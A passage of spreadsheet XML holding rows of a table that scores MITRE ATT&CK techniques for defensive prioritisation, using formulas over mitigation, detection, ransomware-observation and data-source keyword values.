        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ456" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>335.95728642857142</v>
      </c>
      <c r="AR456" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS456" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT456" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU45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8.0227925340136057</v>
      </c>
    </row>
    <row r="457" spans="1:47" ht="136">
      <c r="A457" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B457" s="37">
        <f t="shared" si="7"/>
        <v>1577.3944339999998</v>
      </c>
      <c r="C457" s="37" t="s">
        <v>1600</v>
      </c>
      <c r="D457" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E457" s="37"/>
      <c r="F457" s="37">
        <v>1</v>
      </c>
      <c r="G457" s="37">
        <v>1</v>
      </c>
      <c r="H457" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I457" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J457" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K457" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L457" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M457" s="37">
        <v>0.69861799999999996</v>
      </c>
      <c r="N457" s="56">
        <v>0</v>
      </c>
      <c r="O457" s="56">
        <v>8</v>
      </c>
      <c r="P457" s="56">
        <v>5</v>
      </c>
      <c r="Q457" s="56">
        <v>2</v>
      </c>
      <c r="R457" s="57"/>
      <c r="S457" s="57">
        <v>0</v>
      </c>
      <c r="T457" s="57"/>
      <c r="U457" s="57">
        <v>0</v>
      </c>
      <c r="V457" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>7.1428571428571425E-2</v>
      </c>
      <c r="W457" s="37">
        <v>0</v>
      </c>
      <c r="X457" s="37">
        <v>0</v>
      </c>
      <c r="Y457" s="37">
        <v>0</v>
      </c>
      <c r="Z457" s="37">
        <v>15</v>
      </c>
      <c r="AA457" s="37">
        <v>0.15</v>
      </c>
      <c r="AB457" s="37">
        <v>0.15</v>
      </c>
      <c r="AC457" s="37"/>
      <c r="AD457" s="50" t="s">
        <v>1602</v>
      </c>
      <c r="AE457" s="37" t="str" cm="1">
        <f t="array" ref="AE457">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD457)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF457" s="37">
        <v>453</v>
      </c>
      <c r="AG457" s="37" t="str" cm="1">
        <f t="array" ref="AG457">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD457)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH457" s="37">
        <v>453</v>
      </c>
      <c r="AI457" s="37" t="str" cm="1">
        <f t="array" ref="AI457">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD457)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ457" s="37">
        <v>453</v>
      </c>
      <c r="AK457" s="37" t="str" cm="1">
        <f t="array" ref="AK457">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD457)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL457" s="37">
        <v>453</v>
      </c>
      <c r="AM457" s="37" t="str" cm="1">
        <f t="array" ref="AM457">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD457)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AN457" s="37">
        <v>0</v>
      </c>
      <c r="AO457" s="37">
        <v>0</v>
      </c>
      <c r="AP457" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ457" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>525.79814466666664</v>
      </c>
      <c r="AR457" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS457" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT457" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU45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58" spans="1:47" ht="34">
      <c r="A458" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B458" s="37">
        <f t="shared" si="7"/>
        <v>216.30952380952382</v>
      </c>
      <c r="C458" s="37" t="s">
        <v>1603</v>
      </c>
      <c r="D458" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E458" s="37" t="s">
        <v>1604</v>
      </c>
      <c r="F458" s="37">
        <v>1</v>
      </c>
      <c r="G458" s="37">
        <v>1</v>
      </c>
      <c r="H458" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I458" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J458" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K458" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L458" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M458" s="37">
        <v>0</v>
      </c>
      <c r="N458" s="56">
        <v>0</v>
      </c>
      <c r="O458" s="56">
        <v>4</v>
      </c>
      <c r="P458" s="56">
        <v>0</v>
      </c>
      <c r="Q458" s="56">
        <v>0</v>
      </c>
      <c r="R458" s="57"/>
      <c r="S458" s="57">
        <v>0</v>
      </c>
      <c r="T458" s="57"/>
      <c r="U458" s="57">
        <v>0</v>
      </c>
      <c r="V458" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>1.9047619047619046E-2</v>
      </c>
      <c r="W458" s="37">
        <v>0</v>
      </c>
      <c r="X458" s="37">
        <v>0</v>
      </c>
      <c r="Y458" s="37">
        <v>0</v>
      </c>
      <c r="Z458" s="37">
        <v>4</v>
      </c>
      <c r="AA458" s="37">
        <v>0.04</v>
      </c>
      <c r="AB458" s="37">
        <v>0.04</v>
      </c>
      <c r="AC458" s="37"/>
      <c r="AD458" s="50" t="s">
        <v>210</v>
      </c>
      <c r="AE458" s="37" t="str" cm="1">
        <f t="array" ref="AE458">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD458)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF458" s="37">
        <v>454</v>
      </c>
      <c r="AG458" s="37" t="str" cm="1">
        <f t="array" ref="AG458">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD458)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH458" s="37">
        <v>454</v>
      </c>
      <c r="AI458" s="37" t="str" cm="1">
        <f t="array" ref="AI458">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD458)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ458" s="37">
        <v>454</v>
      </c>
      <c r="AK458" s="37" t="str" cm="1">
        <f t="array" ref="AK458">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD458)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL458" s="37">
        <v>454</v>
      </c>
      <c r="AM458" s="37" t="str" cm="1">
        <f t="array" ref="AM458">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD458)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN458" s="37">
        <v>0</v>
      </c>
      <c r="AO458" s="37">
        <v>1</v>
      </c>
      <c r="AP458" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ458" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>72.103174603174608</v>
      </c>
      <c r="AR458" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS458" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT458" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU45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1.7405517762660621</v>
      </c>
    </row>
    <row r="459" spans="1:47" ht="85">
      <c r="A459" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B459" s="37">
        <f t="shared" si="7"/>
        <v>303.50008671428571</v>
      </c>
      <c r="C459" s="37" t="s">
        <v>1605</v>
      </c>
      <c r="D459" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E459" s="37" t="s">
        <v>1606</v>
      </c>
      <c r="F459" s="37">
        <v>1</v>
      </c>
      <c r="G459" s="37">
        <v>1</v>
      </c>
      <c r="H459" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I459" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J459" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K459" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L459" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M459" s="37">
        <v>0</v>
      </c>
      <c r="N459" s="56">
        <v>0</v>
      </c>
      <c r="O459" s="56">
        <v>2</v>
      </c>
      <c r="P459" s="56">
        <v>0</v>
      </c>
      <c r="Q459" s="56">
        <v>0</v>
      </c>
      <c r="R459" s="57" t="s">
        <v>141</v>
      </c>
      <c r="S459" s="57">
        <v>3</v>
      </c>
      <c r="T459" s="57" t="s">
        <v>584</v>
      </c>
      <c r="U459" s="57">
        <v>3</v>
      </c>
      <c r="V459" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>6.6666714285714287E-2</v>
      </c>
      <c r="W459" s="37">
        <v>6</v>
      </c>
      <c r="X459" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Y459" s="37">
        <v>0.10909099999999999</v>
      </c>
      <c r="Z459" s="37">
        <v>2</v>
      </c>
      <c r="AA459" s="37">
        <v>0.02</v>
      </c>
      <c r="AB459" s="37">
        <v>0.02</v>
      </c>
      <c r="AC459" s="37"/>
      <c r="AD459" s="50" t="s">
        <v>1607</v>
      </c>
      <c r="AE459" s="37" t="str" cm="1">
        <f t="array" ref="AE459">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD459)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF459" s="37">
        <v>455</v>
      </c>
      <c r="AG459" s="37" t="str" cm="1">
        <f t="array" ref="AG459">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD459)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH459" s="37">
        <v>455</v>
      </c>
      <c r="AI459" s="37" t="str" cm="1">
        <f t="array" ref="AI459">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD459)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ459" s="37">
        <v>455</v>
      </c>
      <c r="AK459" s="37" t="str" cm="1">
        <f t="array" ref="AK459">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD459)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL459" s="37">
        <v>455</v>
      </c>
      <c r="AM459" s="37" t="str" cm="1">
        <f t="array" ref="AM459">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD459)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN459" s="37">
        <v>0</v>
      </c>
      <c r="AO459" s="37">
        <v>0</v>
      </c>
      <c r="AP459" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ459" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>101.16669557142858</v>
      </c>
      <c r="AR459" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS459" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT459" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU45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60" spans="1:47" ht="51">
      <c r="A460" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B460" s="37">
        <f t="shared" si="7"/>
        <v>451.9045011904762</v>
      </c>
      <c r="C460" s="37" t="s">
        <v>1608</v>
      </c>
      <c r="D460" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E460" s="37" t="s">
        <v>1609</v>
      </c>
      <c r="F460" s="37">
        <v>1</v>
      </c>
      <c r="G460" s="37">
        <v>1</v>
      </c>
      <c r="H460" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I460" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J460" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K460" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L460" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M460" s="37">
        <v>0</v>
      </c>
      <c r="N460" s="56">
        <v>2</v>
      </c>
      <c r="O460" s="56">
        <v>19</v>
      </c>
      <c r="P460" s="56">
        <v>2</v>
      </c>
      <c r="Q460" s="56">
        <v>0</v>
      </c>
      <c r="R460" s="57">
        <v>2.5</v>
      </c>
      <c r="S460" s="57">
        <v>1</v>
      </c>
      <c r="T460" s="57" t="s">
        <v>1248</v>
      </c>
      <c r="U460" s="57">
        <v>3</v>
      </c>
      <c r="V460" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.14761890476190476</v>
      </c>
      <c r="W460" s="37">
        <v>4</v>
      </c>
      <c r="X460" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Y460" s="37">
        <v>7.2727E-2</v>
      </c>
      <c r="Z460" s="37">
        <v>23</v>
      </c>
      <c r="AA460" s="37">
        <v>0.23</v>
      </c>
      <c r="AB460" s="37">
        <v>0.23</v>
      </c>
      <c r="AC460" s="37"/>
      <c r="AD460" s="50" t="s">
        <v>1610</v>
      </c>
      <c r="AE460" s="37" t="str" cm="1">
        <f t="array" ref="AE460">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD460)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF460" s="37">
        <v>456</v>
      </c>
      <c r="AG460" s="37" t="str" cm="1">
        <f t="array" ref="AG460">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD460)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH460" s="37">
        <v>456</v>
      </c>
      <c r="AI460" s="37" t="str" cm="1">
        <f t="array" ref="AI460">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD460)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ460" s="37">
        <v>456</v>
      </c>
      <c r="AK460" s="37" t="str" cm="1">
        <f t="array" ref="AK460">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD460)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL460" s="37">
        <v>456</v>
      </c>
      <c r="AM460" s="37" t="str" cm="1">
        <f t="array" ref="AM460">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD460)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN460" s="37">
        <v>0</v>
      </c>
      <c r="AO460" s="37">
        <v>1</v>
      </c>
      <c r="AP460" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ460" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>150.63483373015873</v>
      </c>
      <c r="AR460" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS460" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT460" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU46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3.610353184051398</v>
      </c>
    </row>
    <row r="461" spans="1:47" ht="34">
      <c r="A461" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B461" s="37">
        <f t="shared" si="7"/>
        <v>374.50952380952384</v>
      </c>
      <c r="C461" s="37" t="s">
        <v>1611</v>
      </c>
      <c r="D461" s="50" t="s">
        <v>1601</v>
      </c>
      <c r="E461" s="37" t="s">
        <v>1612</v>
      </c>
      <c r="F461" s="37">
        <v>1</v>
      </c>
      <c r="G461" s="37">
        <v>1</v>
      </c>
      <c r="H461" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I461" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J461" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K461" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L461" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M461" s="37">
        <v>0</v>
      </c>
      <c r="N461" s="56">
        <v>0</v>
      </c>
      <c r="O461" s="56">
        <v>0</v>
      </c>
      <c r="P461" s="56">
        <v>0</v>
      </c>
      <c r="Q461" s="56">
        <v>0</v>
      </c>
      <c r="R461" s="57" t="s">
        <v>260</v>
      </c>
      <c r="S461" s="57">
        <v>5</v>
      </c>
      <c r="T461" s="57" t="s">
        <v>1613</v>
      </c>
      <c r="U461" s="57">
        <v>6</v>
      </c>
      <c r="V461" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.10476190476190478</v>
      </c>
      <c r="W461" s="37">
        <v>11</v>
      </c>
      <c r="X461" s="37">
        <v>0.2</v>
      </c>
      <c r="Y461" s="37">
        <v>0.2</v>
      </c>
      <c r="Z461" s="37">
        <v>0</v>
      </c>
      <c r="AA461" s="37">
        <v>0</v>
      </c>
      <c r="AB461" s="37">
        <v>0</v>
      </c>
      <c r="AC461" s="37"/>
      <c r="AD461" s="50" t="s">
        <v>1614</v>
      </c>
      <c r="AE461" s="37" t="str" cm="1">
        <f t="array" ref="AE461">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD461)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF461" s="37">
        <v>457</v>
      </c>
      <c r="AG461" s="37" t="str" cm="1">
        <f t="array" ref="AG461">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD461)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH461" s="37">
        <v>457</v>
      </c>
      <c r="AI461" s="37" t="str" cm="1">
        <f t="array" ref="AI461">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD461)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ461" s="37">
        <v>457</v>
      </c>
      <c r="AK461" s="37" t="str" cm="1">
        <f t="array" ref="AK461">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD461)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL461" s="37">
        <v>457</v>
      </c>
      <c r="AM461" s="37" t="str" cm="1">
        <f t="array" ref="AM461">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD461)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN461" s="37">
        <v>0</v>
      </c>
      <c r="AO461" s="37">
        <v>1</v>
      </c>
      <c r="AP461" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ461" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>124.83650793650794</v>
      </c>
      <c r="AR461" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS461" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT461" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
